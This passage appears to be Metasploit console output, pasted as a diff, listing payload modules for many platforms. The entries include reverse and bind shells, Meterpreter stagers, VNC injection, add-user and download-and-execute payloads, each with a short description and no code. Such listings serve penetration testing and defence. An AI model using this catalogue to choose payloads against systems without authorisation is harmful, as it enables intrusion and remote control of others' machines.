Hidden Bind Ipknock TCP Stager - windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager - windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) - windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager - windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy - windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) - windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager - windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager - windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) - windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support - windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support - windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/x64/exec normal No Windows x64 Execute Command - windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path - windows/x64/messagebox normal No Windows MessageBox x64 - windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager - windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager - windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager - windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager - windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager - windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) - windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) - windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) - windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) - windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) - windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) - windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 - windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager - windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager - windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager - windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) - windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager - windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline - windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline - windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager - windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support - windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager - windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager - windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) - windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager - windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) - windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) - windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 1 aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline + 2 aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline + 3 aix/ppc/shell_interact normal No AIX execve Shell for inetd + 4 aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline + 5 android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager + 6 android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager + 7 android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager + 8 android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline + 9 android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline + 10 android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline + 11 android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager + 12 android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager + 13 android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager + 14 apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + 15 apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + 16 apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + 17 apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline + 18 apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline + 19 apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline + 20 apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline + 21 bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + 22 bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 23 bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 24 bsd/x64/exec normal No BSD x64 Execute Command + 25 bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) + 26 bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP + 27 bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline + 28 bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) + 29 bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP + 30 bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline + 31 bsd/x86/exec normal No BSD Execute Command + 32 bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP + 33 bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline + 34 bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) + 35 bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager + 36 bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager + 37 bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) + 38 bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager + 39 bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline + 40 bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) + 41 bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline + 42 bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline + 43 bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline + 44 bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) + 45 bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager + 46 bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager + 47 bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline + 48 bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline + 49 bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline + 50 cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges + 51 cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP + 52 cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits + 53 cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP + 54 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) + 55 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) + 56 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) + 57 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) + 58 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) + 59 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) + 60 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 + 61 cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) + 62 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) + 63 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 + 64 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) + 65 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) + 66 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 + 67 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) + 68 cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) + 69 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) + 70 cmd/unix/generic normal No Unix Command, Generic Command Execution + 71 cmd/unix/interact normal No Unix Command, Interact with Established Connection + 72 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) + 73 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) + 74 cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) + 75 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) + 76 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) + 77 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) + 78 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) + 79 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) + 80 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) + 81 cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) + 82 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) + 83 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) + 84 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) + 85 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) + 86 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) + 87 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) + 88 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) + 89 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) + 90 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) + 91 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) + 92 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) + 93 cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) + 94 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) + 95 cmd/windows/adduser normal No Windows Execute net user /ADD CMD + 96 cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) + 97 cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) + 98 cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 + 99 cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) + 100 cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS + 101 cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) + 102 cmd/windows/generic normal No Windows Command, Generic Command Execution + 103 cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 104 cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 105 cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) + 106 cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) + 107 cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) + 108 cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) + 109 firefox/exec normal No Firefox XPCOM Execute Command + 110 firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) + 111 firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) + 112 generic/custom normal No Custom Payload + 113 generic/debug_trap normal No Generic x86 Debug Trap + 114 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline + 115 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline + 116 generic/tight_loop normal No Generic x86 Tight Loop + 117 java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline + 118 java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline + 119 java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager + 120 java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager + 121 java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager + 122 java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager + 123 java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager + 124 java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager + 125 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline + 126 linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 127 linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 128 linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 129 linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 130 linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + 131 linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 132 linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 133 linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 134 linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 135 linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline + 136 linux/armle/adduser normal No Linux Add User + 137 linux/armle/exec normal No Linux Execute Command + 138 linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager + 139 linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 140 linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 141 linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 142 linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 143 linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager + 144 linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager + 145 linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline + 146 linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 147 linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 148 linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 149 linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 150 linux/mipsbe/exec normal No Linux Execute Command + 151 linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 152 linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 153 linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 154 linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 155 linux/mipsbe/reboot normal No Linux Reboot + 156 linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 157 linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 158 linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 159 linux/mipsle/exec normal No Linux Execute Command + 160 linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager + 161 linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 162 linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 163 linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 164 linux/mipsle/reboot normal No Linux Reboot + 165 linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 166 linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 167 linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 168 linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 169 linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 170 linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 171 linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 172 linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline + 173 linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 174 linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 175 linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline + 176 linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 177 linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 178 linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 179 linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 180 linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 181 linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 182 linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 183 linux/x64/exec normal No Linux Execute Command + 184 linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager + 185 linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager + 186 linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 187 linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 188 linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 189 linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager + 190 linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 191 linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6) + 192 linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 193 linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + 194 linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline + 195 linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6) + 196 linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 197 linux/x86/adduser normal No Linux Add User + 198 linux/x86/chmod normal No Linux Chmod + 199 linux/x86/exec normal No Linux Execute Command + 200 linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) + 201 linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) + 202 linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager + 203 linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) + 204 linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) + 205 linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager + 206 linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) + 207 linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager + 208 linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager + 209 linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager + 210 linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 211 linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 212 linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 213 linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP + 214 linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline + 215 linux/x86/read_file normal No Linux Read File + 216 linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + 217 linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + 218 linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager + 219 linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) + 220 linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + 221 linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager + 222 linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) + 223 linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager + 224 linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager + 225 linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager + 226 linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) + 227 linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline + 228 linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline + 229 linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline + 230 linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline + 231 linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline + 232 linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) + 233 linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline + 234 linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline + 235 linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline + 236 mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline + 237 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) + 238 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) + 239 netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager + 240 nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) + 241 nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) + 242 nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) + 243 osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager + 244 osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager + 245 osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + 246 osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + 247 osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline + 248 osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline + 249 osx/armle/vibrate normal No Apple iOS iPhone Vibrate + 250 osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager + 251 osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager + 252 osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager + 253 osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + 